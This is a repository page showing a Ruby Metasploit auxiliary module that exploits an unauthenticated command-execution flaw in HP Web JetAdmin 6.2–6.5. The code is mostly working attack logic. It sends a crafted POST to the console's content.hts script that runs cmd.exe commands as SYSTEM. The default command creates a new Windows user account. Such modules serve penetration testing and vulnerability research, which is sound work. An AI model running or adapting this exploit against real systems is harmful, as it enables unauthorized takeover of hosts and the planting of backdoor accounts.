Statistics
| Branch: | Tag: | Revision:

root / modules / auxiliary / admin / http / hp_web_jetadmin_exec.rb @ master

History | View | Annotate | Download (1.6 kB)

1 
##
2 
# $Id$
3 
##
4 

    		
  

  

  

    
      5
    
    
      
##


    		
  

  

  

    
      6
    
    
      
# This file is part of the Metasploit Framework and may be subject to


    		
  

  

  

    
      7
    
    
      
# redistribution and commercial restrictions. Please see the Metasploit


    		
  

  

  

    
      8
    
    
      
# Framework web site for more information on licensing and terms of use.


    		
  

  

  

    
      9
    
    
      
# http://metasploit.com/framework/


    		
  

  

  

    
      10
    
    
      
##


    		
  

  

  

    
      11
    
    
      

    		
  

  

  

    
      12
    
    
      

    		
  

  

  

    
      13
    
    
      
require 'msf/core'


    		
  

  

  

    
      14
    
    
      

    		
  

  

  

    
      15
    
    
      

    		
  

  

  

    
      16
    
    
      
class Metasploit3 < Msf::Auxiliary


    		
  

  

  

    
      17
    
    
      

    		
  

  

  

    
      18
    
    
      
        include Msf::Exploit::Remote::HttpClient


    		
  

  

  

    
      19
    
    
      

    		
  

  

  

    
      20
    
    
      
        def initialize(info = {})


    		
  

  

  

    
      21
    
    
      
                super(update_info(info,


    		
  

  

  

    
      22
    
    
      
                        'Name'           => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',


    		
  

  

  

    
      23
    
    
      
                        'Description'    => %q{


    		
  

  

  

    
      24
    
    
      
                                This module abuses a command execution vulnerability within the


    		
  

  

  

    
      25
    
    
      
                                web based management console of the Hewlett-Packard Web JetAdmin


    		
  

  

  

    
      26
    
    
      
                                network printer tool v6.2 - v6.5. It is possible to execute commands


    		
  

  

  

    
      27
    
    
      
                                as SYSTEM without authentication. The vulnerability also affects POSIX


    		
  

  

  

    
      28
    
    
      
                                systems, however at this stage the module only works against Windows.


    		
  

  

  

    
      29
    
    
      
                                This module does not apply to HP printers.


    		
  

  

  

    
      30
    
    
      
                        },


    		
  

  

  

    
      31
    
    
      
                        'Author'         => [ 'patrick' ],


    		
  

  

  

    
      32
    
    
      
                        'License'        => MSF_LICENSE,


    		
  

  

  

    
      33
    
    
      
                        'Version'        => '$Revision$',


    		
  

  

  

    
      34
    
    
      
                        'References'     =>


    		
  

  

  

    
      35
    
    
      
                                [


    		
  

  

  

    
      36
    
    
      
                                        [ 'OSVDB', '5798' ],


    		
  

  

  

    
      37
    
    
      
                                        [ 'BID', '10224' ],


    		
  

  

  

    
      38
    
    
      
                                        #[ 'CVE', '' ],# No CVE!


    		
  

  

  

    
      39
    
    
      
                                        [ 'URL', 'http://www.milw0rm.com/exploits/294' ],


    		
  

  

  

    
      40
    
    
      
                                ],


    		
  

  

  

    
      41
    
    
      
                        'DisclosureDate' => 'Apr 27 2004'))


    		
  

  

  

    
      42
    
    
      

    		
  

  

  

    
      43
    
    
      
                        register_options(


    		
  

  

  

    
      44
    
    
      
                                [


    		
  

  

  

    
      45
    
    
      
                                        Opt::RPORT(8000),


    		
  

  

  

    
      46
    
    
      
                                        OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),


    		
  

  

  

    
      47
    
    
      
                                ], self.class)


    		
  

  

  

    
      48
    
    
      
        end


    		
  

  

  

    
      49
    
    
      

    		
  

  

  

    
      50
    
    
      
        def run


    		
  

  

  

    
      51
    
    
      
                cmd = datastore['CMD'].gsub(' ', ',')


    		
  

  

  

    
      52
    
    
      

    		
  

  

  

    
      53
    
    
      
                send_request_cgi({


    		
  

  

  

    
      54
    
    
      
                                'uri'     => '/plugins/framework/script/content.hts',


    		
  

  

  

    
      55
    
    
      
                                'method'  => 'POST',


    		
  

  

  

    
      56
    
    
      
                                'data'    => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + cmd + ',)'


    		
  

  

  

    
      57
    
    
      
                        }, 3)


    		
  

  

  

    
      58
    
    
      
        end


    		
  

  

  

    
      59
    
    
      

    		
  

  

  

    
      60
    
    
      
end


    		
  

  

  

    
      61